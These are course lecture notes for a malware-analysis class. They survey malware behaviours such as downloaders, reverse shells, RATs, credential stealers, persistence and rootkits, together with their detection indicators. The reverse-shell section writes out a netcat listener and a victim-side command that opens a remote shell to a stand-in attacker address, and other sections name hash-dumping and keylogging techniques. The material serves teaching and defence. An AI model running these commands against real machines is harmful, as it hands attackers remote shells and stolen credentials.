Chapter 12 Notes

to accompany Sikorski and Honig, Practical Malware Analysis, no starch press.

In the printed book this is Chapter 11.

Malware Behavior

A whirlwind tour of malware functionality

Downloaders and Launchers

• Downloaders get a file from the Internet, presumably malware, and run it.
• Use API call URLDownloadtoFileA, followed by a call to WinExec
• A "launcher" (or "loader") installs malware, for immediate or future execution.
• The launcher may have the malcode encoded inside it
  • The launcher may be a script, not an executable binary in its own right

Backdoors

• Provides an attacker with remote access
• Common, and lots of variety
  • many take advantage of holes in the Remote Desktop Protocol (RDP)
• A backdoor will often use HTTP to communicate with its masters
• Functionality may include registry manipulation, creating windows, file system operations, etc.

Reverse Shells

• A form of backdoor, which gives attacker a shell
• Using netcat: attacker will run nc -l -p 80 to listen for incoming connections
• Victim will be made to run nc atta.cker.ip.addr 80 -e cmd.exe, causing a shell to run on the victim machine with I/O over the socket.
• Windows Reverse Shells can be basic, or multi-threaded.
• Basic: call CreateProcess with certain STARTUPINFO as input argument, window suppressed
• Multi-threaded: two pipes and two threads, allowing information sent over STDIN or STDOUT to be encoded
• So CreateThread and CreatePipe are indicators.
• Might be easier (or harder?) to notice the traffic using Wireshark
  • did we demonstrate Wireshark?

RATs

• RAT = Remote Administration Tool
  • not malicious per se, since sysadmins need such a utility to, for example, apply patches to a lab full of PCs
• Servers are installed on compromised victim machines.
• They make contact with the RAT client, which then tells them what to do
• "Poison Ivy is a freely available and popular RAT..."
  • doesn't seem to be available at the old web site, but I found a copy here
  • and was able to install it, generate a malware specimen, and VirusTotal went nuts!
  • demonstrate use of Poison Ivy to build and run malware
  • the OVA file for my Windows XP machine. (UMBC only) About 2.4 GB in size.
    

Botnets

• Botnets employ sets of compromised hosts (zombies)
  • RATs work on a more individual level than Botnets
  • Botnets usually tell all the zombies to do the same thing, e.g. mass vs. targeted attacks
• There's a literature on Botnets,
  • the article "Your botnet is my botnet" is a liitle old now, but still a favorite of mine

Credential Stealers

• Graphical Identification and Authentication (GINA) allows the use of RFID and smart cards for
  logon security, which is good, except when malware authors get involved
• The registry has a key that tells where customized GINA DLLs can be found
• So winlogon.exe will load those DLLs, and then load the default msgina.dll
• So a DLL with many functions of the form Wlx is suspicious
  
  
• Pass the Hash!
• Windows hashes are a good source of system credentials, and utilities such as PWdump and Pass-the-Hash are available.
• Hash dumping tools often use the Local Security Authority Subsystem Service, lsass.exe, for their activities
• Keystroke logging!
  • kernel-based keyloggers can act as keyboard drivers, bypassing normal protections.
  • user-space keyloggers can use hooking or polling
  • "Hooking uses the Windows API to notify the malware each time a key is pressed, typically with the SetWindowsHookEx function. Polling uses the Windows API to constantly poll the state of the keys, typically using the GetAsyncKeyState and GetForegroundWindow functions."
  • strings such as [Num Lock] in strings listings are suspicious

Persistence Mechanisms

• We've talked about this a lot!
• Malware can hide in the Registry, e.g. HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run
• The Autoruns tool helps find such items
• ProcMon tells us of changes to the Registry
• "AppInit_DLLs are loaded into every process that loads User32. dll, and a simple insertion into the registry will make AppInit_DLLs persistent."
• WinLogon notify and svchost are other popular places to hide
• Trojanizing system binaries: malware modifies system software, such a popular DLLs, to do its dirty work.
• Checking MD5 hashes will help discover such trojanized binaries, and IDA can be used to see what's going on
• DLL-load order hijacking: place malicious files in directories, according to loader's search path, so that malware is loaded instead of legitmate code (this trick is as old as the hills)

Privilege Escalation

• Metasploit "Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments."
• Windows API calls exist to adjust a process's privileges, so code that uses these calls is suspect
• "It’s typically not necessary to analyze the intricate details of the escalation method that malware uses." Maybe so, but new ways of doing this are precioussssss

User-mode Rootkits

• Rootkits are supposed to hide malicious activity
• Books are devoted to this topic
• IAT Hooking modifies the Import Address Table or the Export Address Table, so that malware is
  executed instead of legitimate system code
• Easy to detect, for example, by setting breakpoints on the IAT and EAT (?)
• Inline Hooking overwrites legit DLL code